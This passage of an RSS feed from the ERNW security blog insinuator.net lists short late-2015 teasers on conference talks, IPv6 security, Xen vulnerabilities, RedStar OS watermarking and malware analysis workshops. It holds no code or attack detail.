      <description>&lt;p&gt;Niklaus and me had the chance to talk about our research on RedStar OS on the 32nd Chaos Communication Congress in Hamburg this year. You can see the talk online at &lt;a href=&#34;https://media.ccc.de/v/32c3-7174-lifting_the_fog_on_red_star_os#video&#34;&gt;media.ccc.de&lt;/a&gt; or on &lt;a href=&#34;https://www.youtube.com/watch?v=KTBemKiSgWI&#34;&gt;Youtube&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;We talked about the details of the watermarking mechanism that &lt;a href=&#34;https://www.insinuator.net/2015/07/redstar-os-watermarking/&#34;&gt;we found in July&lt;/a&gt; and additional features of RedStar OS like it’s “Virus Scanner” and the system architecture. During the days after our talk we were able to find watermarks applied by RedStar OS in the wild on some sites on the Internet. We can confirm at least 7 different instances of RedStar OS that have applied watermarks to JPGs. Cleaning up the data is work in progress and we will get back to you with the results! Niklaus has put our presentation and additional resources in the &lt;a href=&#34;https://github.com/takeshixx/redstar-tools&#34;&gt;git&lt;/a&gt;. Feel free to join us in our research and make the world a safer place!&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR16 IPv6 Security Summit – New Talks Added</title>
      <link>https://insinuator.net/2015/12/%23tr16-ipv6-security-summit-new-talks-added/</link>
      <pubDate>Wed, 23 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/%23tr16-ipv6-security-summit-new-talks-added/</guid>
      <description>&lt;p&gt;In the interim we’ve worked on the agenda of next year’s &lt;em&gt;&lt;a href=&#34;https://www.troopers.de/ipv6-security-summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt;&lt;/em&gt; (for those not familiar with the event, &lt;a href=&#34;https://www.troopers.de/events/troopers15/322_ipv6_security_summit/&#34;&gt;here’s the 2015 edition&lt;/a&gt; and &lt;a href=&#34;https://www.troopers.de/events/troopers14/372_ipv6_security_summit/&#34;&gt;here the one of 2014&lt;/a&gt;), and some new talks have been added.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Rafael Schaefer: Advanced IPv6 Attacks Using Chiron. Hands-On Workshop&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Outline: During the IPv6 Security Summit at Troopers 14, &lt;a href=&#34;http://www.secfu.net/tools-scripts/&#34;&gt;Chiron&lt;/a&gt;, an all-in-one IPv6 penetration testing framework was released publicly for first time. Since then, the advanced features of Chiron were used to discover some 0-day evasion techniques against high-end commercial and open-source Intrusion Detection / Prevention Systems. Moreover, for Troopers 15 it was enhanced with new features, like advanced MLD support and a fake DHCPv6 server, which can be combined with its other features, like the use of arbitrary Extension Headers and fragmentation to leverage really advanced attacks.&lt;br&gt;&#xA;In this workshop, after a quick refreshing to the basic capabilities of Chiron, we will focus on the advanced IPv6 functionalities that the framework offers. We will not only show how to reproduce the latest published IPv6 attacks, but moreover, how you can create your own arbitrary IPv6 attacking scenarios for your own security assessments or penetration testing purposes. A lab will be set up in order not only to reproduce the presented techniques, but to also try your skills and – why not – to discover your own 0-day techniques :).&lt;/p&gt;</description>
    </item>
    <item>
      <title>4th Round of TROOPERS16 Talks Accepted</title>
      <link>https://insinuator.net/2015/12/4th-round-of-troopers16-talks-accepted/</link>
      <pubDate>Tue, 22 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/4th-round-of-troopers16-talks-accepted/</guid>
      <description>&lt;p&gt;As we come to the end of the year we can’t help but take a moment to thank all of your who made TROOPERS15 special! It just makes us all the more pumped to kick it up a notch for TROOPERS16!! #BestWeekEver&lt;/p&gt;&#xA;&lt;p&gt;Happy Holiday and much Joy to you in the New Year!&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;Aaron Zauner: &lt;a href=&#34;https://www.troopers.de/events/troopers16/609_bettercrypto_three_years_in/&#34;&gt;BetterCrypto: three years in&lt;/a&gt;&lt;br&gt;&#xA;&lt;strong&gt;FIRST TIME TROOPERS SPEAKER&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;The BetterCrypto Project started out in the fall of 2013 as a collaborative community effort by systems engineers, security engineers, developers and cryptographers to build up a sound set of recommendations for strong cryptography and privacy enhancing technologies catered towards the operations community in the face of overarching wiretapping and data-mining by nation-state actors. The project has since evolved with a lot of positive feedback from the open source and operations community in general with input from various browser vendors, linux distribution security teams and researchers.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 4: Traffic Filtering in IPv6 Networks (II)</title>
      <link>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-4-traffic-filtering-in-ipv6-networks-ii/</link>
      <pubDate>Tue, 22 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-4-traffic-filtering-in-ipv6-networks-ii/</guid>
      <description>&lt;p&gt;In this part of our little series (&lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/&#34;&gt;part 1&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-2-network-isolation-on-the-routing-layer/&#34;&gt;part 2&lt;/a&gt;, &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-3-traffic-filtering-in-ipv6-networks-i/&#34;&gt;part 3&lt;/a&gt;) we continue discussing IPv6 specific filtering of network traffic, namely at intersection points.&lt;/p&gt;&#xA;&lt;p&gt;As stated in the 1st part, a number of potential security problems in IPv6 networks are related to Extension Headers of IPv6, in particular when combined with fragmentation. At the same time, as of today (December 2015) there is no Internet service or application that actually needs those headers.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Teaser on the TROOPERS16 Incident Analysis Workshop: Analyzing the current Spam Flood</title>
      <link>https://insinuator.net/2015/12/teaser-on-the-troopers16-incident-analysis-workshop-analyzing-the-current-spam-flood/</link>
      <pubDate>Fri, 18 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/teaser-on-the-troopers16-incident-analysis-workshop-analyzing-the-current-spam-flood/</guid>
      <description>&lt;p&gt;As we are giving another round of our Incident &lt;a href=&#34;https://www.troopers.de/events/troopers16/566_incident_analysis/&#34;&gt;Analysis workshop&lt;/a&gt; at &lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;Troopers16&lt;/a&gt;, we wanted to give a little sample taste what you can expect.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Table of Contents&lt;/strong&gt;&lt;br&gt;&#xA;&lt;a href=&#34;#extraction&#34;&gt;&lt;strong&gt;Extracting Mail Attachments&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;#word&#34;&gt;&lt;strong&gt;Word Document Analysis&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;#static&#34;&gt;&lt;strong&gt;Static JavaScript Analysis&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&#xA;&lt;a href=&#34;#dynamic&#34;&gt;&lt;strong&gt;Dynamic JavaScript Analysis&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Before we dive into the analysis, I wanted to mention that if you are going to analyze anything unknown/potentially malicious, do it in a safe environment (VM with no internet connection, in the best case on a separate physical analysis device, or at least strip all unnecessary functionality from that VM (CVE-2015-3456 is an example to answer the “why”)). Even things like looking at content with a text editor or extracting zip files should be done in the safe environment, as those tools could contain vulnerabilities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>3rd Round of TROOPERS16 Talks Accepted</title>
      <link>https://insinuator.net/2015/12/3rd-round-of-troopers16-talks-accepted/</link>
      <pubDate>Thu, 17 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/3rd-round-of-troopers16-talks-accepted/</guid>
      <description>&lt;p&gt;Here at TROOPERS HQ we are well into the Holiday (read TROOPERS) Spirit so we thought we would publish another round of talks! The current agenda can be found &lt;a href=&#34;https://www.troopers.de/troopers16/agenda/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Happy Holidays!&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;2nd Day Keynote&lt;br&gt;&#xA;&lt;strong&gt;FIRST TIME TROOPERS SPEAKER&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Bio:&lt;/strong&gt; Ben Zevenbergen joined the Oxford Internet Institute to pursue a DPhil on the intersection of privacy law, technology, social science, and the Internet. He runs a side project that aims to establish ethics guidelines for Internet research, as well as working in multidisciplinary teams such as the EU funded Network of Excellence in Internet Science. He has worked on legal, political and policy aspects of the information society for several years. Most recently he was a policy advisor to an MEP in the European Parliament, working on Europe’s Digital Agenda. Previously Ben worked as an ICT/IP lawyer and policy consultant in the Netherlands. Bendert holds a degree in law, specialising in Information Law.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Xen XSA 155: Double fetches in paravirtualized devices</title>
      <link>https://insinuator.net/2015/12/xen-xsa-155-double-fetches-in-paravirtualized-devices/</link>
      <pubDate>Thu, 17 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/xen-xsa-155-double-fetches-in-paravirtualized-devices/</guid>
      <description>&lt;p&gt;As part of my research on the security of paravirtualized devices, I reported a number of vulnerabilities to the Xen security team, which were patched &lt;a href=&#34;http://xenbits.xen.org/xsa/advisory-155.html&#34;&gt;today&lt;/a&gt;. All of them are double fetch vulnerabilities affecting the different backend components used for paravirtualized devices. While the severity and impact of these bugs varies heavily and is dependent on a lot of external factors, I would recommend patching them as soon as possible. In the rest of this blog post I’ll give a short teaser about my research with full details coming out in the first quarter of 2016 .&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 3: Traffic Filtering in IPv6 Networks (I)</title>
      <link>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-3-traffic-filtering-in-ipv6-networks-i/</link>
      <pubDate>Mon, 14 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-3-traffic-filtering-in-ipv6-networks-i/</guid>
      <description>&lt;p&gt;So this is the third part of our little series on securing IPv6 in enterprise environments. In the &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/&#34;&gt;first part&lt;/a&gt; we tried to develop an understanding of threats in IPv4 networks as a kind-of baseline while analyzing the main differences induced by IPv6 and in the &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-2-network-isolation-on-the-routing-layer/&#34;&gt;second part&lt;/a&gt; we laid out protection strategies on the infrastructure level, focusing on network isolation on the routing layer. Today I’ll dive into discussing IPv6-specific filtering of network traffic.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Investigating Memory Analysis Tools – SSDT Hooking via Pointer Replacement</title>
      <link>https://insinuator.net/2015/12/investigating-memory-analysis-tools-ssdt-hooking-via-pointer-replacement/</link>
      <pubDate>Sun, 13 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/investigating-memory-analysis-tools-ssdt-hooking-via-pointer-replacement/</guid>
      <description>&lt;p&gt;In this blogpost we will briefly explain a well known Syscall hooking technique (a more detailed explanation can be gathered from e.g.  http://resources.infosecinstitute.com/hooking-system-service-dispatch-table-ssdt/) used by multiple malware samples (like the laqma trojan) and right after discuss how some memory analysis tools have trouble in the analysis and/or reporting of these.&lt;/p&gt;&#xA;&lt;p&gt;Before we go further, I just shortly wanted to say, that this post is not intended to be a bashing of any tool. We have the greatest respect for all the effort and work which has been and most probably will be done in the future.&lt;/p&gt;</description>
    </item>
    <item>
      <title>2nd Rounds of TROOPERS16 Talks</title>
      <link>https://insinuator.net/2015/12/2nd-rounds-of-troopers16-talks/</link>
      <pubDate>Fri, 11 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/2nd-rounds-of-troopers16-talks/</guid>
      <description>&lt;p&gt;Here’s the second round of TROOPERS16 talks. For more information  check out our website: &lt;a href=&#34;https://www.troopers.de/&#34;&gt;TROOPERS&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Happy Holidays and all the best for 2016 to everybody!&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;&#xA;&lt;p&gt;===&lt;/p&gt;&#xA;&lt;p&gt;Ivan Pepelnjak: Real-life Software-Defined Security&lt;/p&gt;&#xA;&lt;p&gt;Vendors, pundits, and industry media love to talk about Software-Defined Everything, but nothing ever changes in the enterprise world, right? Wrong. Some engineers are already solving security problems with a software-defined approach to networking and security, be it microsegmentation in NSX or OpenStack environment, building scale-out IDS clusters, or respond to DoS or intrusion events in real-time… and we’ll cover all these ideas in this fast-paced presentation&lt;/p&gt;</description>
    </item>
    <item>
      <title>First Talks of TROOPERS 2016 Accepted!</title>
      <link>https://insinuator.net/2015/12/first-talks-of-troopers-2016-accepted/</link>
      <pubDate>Wed, 09 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/first-talks-of-troopers-2016-accepted/</guid>
      <description>&lt;p&gt;Here’s the first round of TROOPERS16 talks. For more information  check out our website: &lt;a href=&#34;https://www.troopers.de&#34;&gt;TROOPERS&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Happy Holidays and all the best for 2016 to everybody!&lt;/p&gt;&#xA;&lt;p&gt;Your TROOPERS Team&lt;/p&gt;&#xA;&lt;p&gt;===&lt;br&gt;&#xA;Mike Ossmann: Rapid Radio Reversing&lt;/p&gt;&#xA;&lt;p&gt;Wireless security researchers have an unprecedented array of tools at their disposal today. Although Software Defined Radio (SDR) is the single most valuable tool for reverse engineering wireless signals, it is sometimes faster and easier to use other tools for portions of the reverse engineering process. I’ll discuss how beneficial a hybrid SDR/non-SDR approach has been to security researchers, and I’ll walk through an example of the process.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 2: Network Isolation on the Routing Layer</title>
      <link>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-2-network-isolation-on-the-routing-layer/</link>
      <pubDate>Mon, 07 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-2-network-isolation-on-the-routing-layer/</guid>
      <description>&lt;p&gt;In the &lt;a href=&#34;https://www.insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-part-1-baseline-analysis-of-ipv4-network-security/&#34;&gt;first part&lt;/a&gt; of this series we tried to identify which risks related to network-related threats actually change when IPv6 gets deployed and hence which ones to take care of in a prioritized manner (as opposed to those which one might be tempted to [initially] disregard with a “has been there in IPv4 already and we did not address it then, why now?” stance). Let’s assume we went through this step and, for those most relevant risks we identified, we want to come up with infrastructure level controls first, before tackling controls to be deployed on the host level (as in many organizations the sysowners of “hosts” like servers in datacenters tend to expect “the network/infrastructure guys to provide the 1st layer of defense against threats”, in particular once those originate from an apparent network layer protocol, that is IPv6).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security</title>
      <link>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-1-baseline-analysis-of-ipv4-network-security/</link>
      <pubDate>Wed, 02 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/developing-an-enterprise-ipv6-security-strategy-/-part-1-baseline-analysis-of-ipv4-network-security/</guid>
      <description>&lt;p&gt;We’ve been involved in some activities in this space recently and I thought it could be a good idea to share a couple of things we’ve discussed &amp;amp; displayed. Furthermore some time ago – in the &lt;em&gt;&lt;a href=&#34;https://www.insinuator.net/2015/06/is-ipv6-more-secure-than-ipv4-or-less/&#34;&gt;Is IPv6 more Secure than IPv4? Or Less?&lt;/a&gt;&lt;/em&gt; post – I announced to come up with (something like) an “IPv6 threats &amp;amp; controls catalogue” at some point… so here we go: in an upcoming series of a few blogposts I will lay out some typical elements of an “Enterprise IPv6 Security Strategy” incl. several technical pieces (and I plan to give a talk on the exact topic at next year’s &lt;a href=&#34;https://www.troopers.de/ipv6-security-summit/&#34;&gt;IPv6 Security Summit&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Welcome to Brazil!</title>
      <link>https://insinuator.net/2015/12/welcome-to-brazil/</link>
      <pubDate>Tue, 01 Dec 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/12/welcome-to-brazil/</guid>
      <description>&lt;p&gt;Welcome to Brazil!&lt;/p&gt;&#xA;&lt;p&gt;“Welcome to Brazil”, I think, turned to being the most used statement during the past Hackers to Hackers Conference in Sao Paulo. It was used as the main reaction to every speech taking moment, and there were a lot of those! To honor the moments and give you a quick insight into was what going on in Sao Paulo, here is a quick summary of the overall event and our own contribution.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DENOG7</title>
      <link>https://insinuator.net/2015/11/denog7/</link>
      <pubDate>Thu, 19 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/denog7/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;/p&gt;&#xA;&lt;p&gt;we (Christopher, Jan-Pascal and me) had the pleasure to join the 7th &lt;a href=&#34;http://www.denog.de/meetings/denog7/?lang=de&#34;&gt;DENOG&lt;/a&gt; (German Network Operators Group) &lt;a href=&#34;http://www.denog.de/meetings/denog7/?lang=de&#34;&gt;meeting&lt;/a&gt; in Darmstadt which takes place yearly in autumn. For the first time the meeting was scheduled for two days which offered more time for talks and discussions than the previous meetings. The concept of DENOG is to meet, talk, discuss and share experience with the network operator community in Germany. &lt;/p&gt;&#xA;&lt;p&gt;The meeting started withe a talk from Peter Sievers from Juniper about Network Automation and Programmability. He presented why automation and programmability is getting more and more important even for network operators. It will help to automate the build process, the configuration and should ideally help you operating and troubleshooting your envirnoment. The focus of the talk was on the platforms which are already available and ready to use to automate day to day activities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>13th escar Europe conference | Embedded Security in Cars</title>
      <link>https://insinuator.net/2015/11/13th-escar-europe-conference-embedded-security-in-cars/</link>
      <pubDate>Tue, 17 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/13th-escar-europe-conference-embedded-security-in-cars/</guid>
      <description>&lt;p&gt;Last week I had the pleasure to attend the “&lt;strong&gt;escar&lt;/strong&gt;” (&lt;em&gt;Embedded Security in Cars&lt;/em&gt;) &lt;strong&gt;conference&lt;/strong&gt; in &lt;em&gt;Cologne, Germany&lt;/em&gt;.&lt;br&gt;&#xA;Arriving late Tuesday, I had the chance to get a rich breakfast before joining the con in the hotel Dorint at Cologne’s famous place the Heumarkt. Unfortunately I had to deal with two stumbling blocks on my way to the Dobrint: The magnetic sensor of my mobile which went crazy (no compass) and – the date. 11th of November in Cologne means just one thing – &lt;em&gt;&lt;strong&gt;carneval&lt;/strong&gt;&lt;/em&gt;! The whole city was just in a state of exception. Everybody on my way to the venue seemed to be drinking or beeing already drunk – at 9am! 😉&lt;br&gt;&#xA;Being a little late, I went straight to the room after registration. As there was only one track to follow you could not miss any talk – nice thing!&lt;br&gt;&#xA;After we were welcomed by the hosts, and the first talk started.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Wireless LAN Pros Conference</title>
      <link>https://insinuator.net/2015/11/wireless-lan-pros-conference/</link>
      <pubDate>Wed, 11 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/wireless-lan-pros-conference/</guid>
      <description>&lt;p&gt;Last week, on the 27th-28th I attended a nice wireless conference in berlin, the WLPC (Wireless LAN Pros Conference). You can visit their website at &lt;a href=&#34;http://berlin2015.wlanprosconference.com/http:/berlin2015.wlanprosconference.com/&#34;&gt;http://berlin2015.wlanprosconference.com.&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;This conference is a community-driven conference from wireless professionals with focus on typical topics that come up when you are planning or running large wireless networks. This is a mainly Twitter based community, you can see some Tweets with hashtags #WLPC for example. There were also some interesting talks about future networks, for example Marko Tisler gave a talk about wireless LAN and SDN and what we can expect and what SDN will not solve for wireless networks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Visual Guide to Day-Con 9</title>
      <link>https://insinuator.net/2015/11/a-visual-guide-to-day-con-9/</link>
      <pubDate>Mon, 09 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/a-visual-guide-to-day-con-9/</guid>
      <description>&lt;h2 id=&#34;welcome-to-dayton&#34;&gt;Welcome to Dayton&lt;/h2&gt;&#xA;&lt;p&gt;In mid-October our friend Bryan Fite aka Angus Blitter invited the community for the ninth edition of &lt;a href=&#34;http://day-con.org/&#34;&gt;Day-Con&lt;/a&gt;. Bryan’s annual security summit, which we regard as the sister event of TROOPERS, is a pretty good reason to visit lovely Dayton, Ohio.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/11/IMG_2144.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/11/IMG_2144.jpg&#34; alt=&#34;Day-Con Summit&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;And so we did… ERNW sent in five delegates. Delegates is &lt;em&gt;Day-Con-speak&lt;/em&gt; for all attendees and speakers and such a subtle choice of wording sets the tone for the whole event. People seemed to be really focused and the roundtable-like setting during the talks (see above) provided a cozy atmosphere for in-depth expert chatting.&lt;/p&gt;</description>
    </item>
    <item>
      <title>“We have a Code Blue right here!”</title>
      <link>https://insinuator.net/2015/11/we-have-a-code-blue-right-here/</link>
      <pubDate>Wed, 04 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/we-have-a-code-blue-right-here/</guid>
      <description>&lt;p&gt;That was the opener for my presentation on the Security in Medical Devices at &lt;a href=&#34;http://codeblue.jp/2015/en/&#34;&gt;CodeBlue 2015&lt;/a&gt; last week in Tokyo, Japan. A &lt;a href=&#34;https://en.wikipedia.org/wiki/Hospital_emergency_codes#Code_Blue&#34;&gt;Code Blue&lt;/a&gt; often describes a patient in a critical condition, mostly needing resuscitation. That just seemed to be a perfect match, also in the sense that the condition of some medical devices out there are still pretty critical concerning security. If you follow our current research on this you know what I am talking about. I hope that we are not talking about this topic anymore three years from now. That would mean that we have made the world a safer place, although it took some time … 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Notes on the “Drop IPv6 Fragments” vs. “This Will Break DNS[SEC]” Debate</title>
      <link>https://insinuator.net/2015/11/some-notes-on-the-drop-ipv6-fragments-vs.-this-will-break-dnssec-debate/</link>
      <pubDate>Tue, 03 Nov 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/11/some-notes-on-the-drop-ipv6-fragments-vs.-this-will-break-dnssec-debate/</guid>
      <description>&lt;p&gt;Some readers will probably be aware that we are amongst the proponents of a quite strict stance when it comes to filtering IPv6 packets with (certain) Extension Headers and/or fragmentation, because those can be the source of many security problems (as laid out &lt;a href=&#34;https://www.ernw.de/download/eu-14-Atlasis-Rey-Schaefer-briefings-Evasion-of-HighEnd-IPS-Devices-wp.pdf&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://gsec.hitb.org/materials/sg2015/D3%20-%20Marc%20Heuse%20-%20Hiding%20in%20Complexity.pdf&#34;&gt;here&lt;/a&gt; or &lt;a href=&#34;https://www.insinuator.net/2015/01/evasion-of-cisco-acls-by-abusing-ipv6-discussion-of-mitigation-techniques/&#34;&gt;here&lt;/a&gt;). Actually I still think it was a very good idea of, amongst others, Randy Bush and Ron Bonica to &lt;a href=&#34;https://tools.ietf.org/id/draft-bonica-6man-frag-deprecate-02.txt&#34;&gt;suggest the deprecation of IPv6 fragmentation in the IETF&lt;/a&gt;.&lt;br&gt;&#xA;On the other hand there are voices arguing that fragmented IPv6 packets will be needed in some cases, namely DNS[SEC]-related ones.&lt;br&gt;&#xA;In this post I will discuss some details of this debate (taking place in many circles, incl. &lt;a href=&#34;http://lists.si6networks.com/pipermail/ipv6hackers/2015-October/thread.html&#34;&gt;this thread&lt;/a&gt; on the &lt;em&gt;ipv6-hackers&lt;/em&gt; mailing list which, btw, &lt;a href=&#34;http://lists.si6networks.com/listinfo/ipv6hackers/&#34;&gt;you should subscribe to&lt;/a&gt;).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Social Coding – Simple Things to Keep in Mind (updated)</title>
      <link>https://insinuator.net/2015/10/social-coding-simple-things-to-keep-in-mind-updated/</link>
      <pubDate>Mon, 26 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/social-coding-simple-things-to-keep-in-mind-updated/</guid>
      <description>&lt;p&gt;The current trend of social coding finally arrived at ERNW! From now on, you will find our public released tools and scripts commonly on &lt;a href=&#34;https://github.com/ernw&#34;&gt;https://github.com/ernw&lt;/a&gt;. Therefore I would like to share some thoughts/guidelines which you have to keep in mind if you want to be a social coder:&lt;/p&gt;&#xA;&lt;p&gt;Github and other repository hosts are great if you want to share opensource tools with the community, as they will find a common platform with defined workflows to extend/fix the work to get better software for everyone. What some should note is that (especially in terms of decentralized version control systems (DVCSs) like git, bazaar or mercurial) public really means public. Back in earlier days, if you shared your code with others you probably created a source code package of a defined version of your code. They will get the files you published, nothing more (and nothing less). Beginning with websites like sourceforge, a broader range of public VCSs came up (mostly driven by CVS or SVN). At this time, others were able to view your commit history (if you granted access to them) and all your mistakes you’ve done before your published code state (for example accidentally committed sensitive data). Those mistakes can still happen today. The difference with the DVCS used nowadays is that most of the time you have lesser control of your commit history (in the same way if someone had copied your history commit by commit in SVN, but then you may had noticed it because of the high network traffic). With DVCS, everyone gets a full copy (clone) of your repository even on a simple “checkout” (as called in SVN). This means he/she is able to search your history locally and has all the time he/she needs to do it. Even if you delete your repository (or modify the history), the original state is shared over all who have cloned it beforehand (thats one reason why DMCA takedowns are not that powerful/useful against git repositories).  Most of the public hosting platforms even included a search over all repositories (which is really useful if you want to find some tool or try to find the reason why a local tool doesn’t work).&lt;/p&gt;</description>
    </item>
    <item>
      <title>OCSP over HTTP testing with Python</title>
      <link>https://insinuator.net/2015/10/ocsp-over-http-testing-with-python/</link>
      <pubDate>Mon, 19 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/ocsp-over-http-testing-with-python/</guid>
      <description>&lt;p&gt;Dear Readers,&lt;/p&gt;&#xA;&lt;p&gt;today we want to share a method on how to test an OCSP over HTTP validation service with Burp and some Python magic. First a little background about OCSP (Online Certificate Status Protocol): the main purpose of OCSP is to validate the status of an X.509 certificate.&lt;/p&gt;&#xA;&lt;p&gt;The OCSP responder is the key part of the system. It is run by the certificate authority and responds with one of three possible different answers. The first one is “good”, which indicates that the certificate is not banned, “revoked” means that the certificate is banned, and “unknown” simply says that the status could not be determined, because the issuing CA of the Cert is not known to the responder.&lt;/p&gt;</description>
    </item>
    <item>
      <title>hardwear.io: Applied Physical Attacks on x86 Systems</title>
      <link>https://insinuator.net/2015/10/hardwear.io-applied-physical-attacks-on-x86-systems/</link>
      <pubDate>Sat, 10 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/hardwear.io-applied-physical-attacks-on-x86-systems/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/casey_davis_superbloodmoon.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/10/casey_davis_superbloodmoon-280x300.jpg&#34; alt=&#34;stolen off the internet&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;On Monday the 28th of September 2015 a rather rare event occurred. At around 4 a.m. the moon changed its colour into a dim of red, luckily the sky was clear enough to see something.&lt;/p&gt;&#xA;&lt;p&gt;[ picture stolen from &lt;a href=&#34;http://www.nasa.gov/image-feature/super-blood-moon-photo-contest-winner&#34;&gt;NASA&lt;/a&gt; ]&lt;/p&gt;&#xA;&lt;p&gt;If you missed that event your next chance will be in about 15 years or so.&lt;/p&gt;&#xA;&lt;p&gt;The reason for being awake this early wasn’t the moon in the first place but what followed afterwards – my trip to the &lt;a href=&#34;http://hardwear.io/&#34;&gt;hardwear.io Security Conference&lt;/a&gt; in The Hague.&lt;/p&gt;</description>
    </item>
    <item>
      <title>hardwear.io: Conference Day 1</title>
      <link>https://insinuator.net/2015/10/hardwear.io-conference-day-1/</link>
      <pubDate>Sat, 10 Oct 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/10/hardwear.io-conference-day-1/</guid>
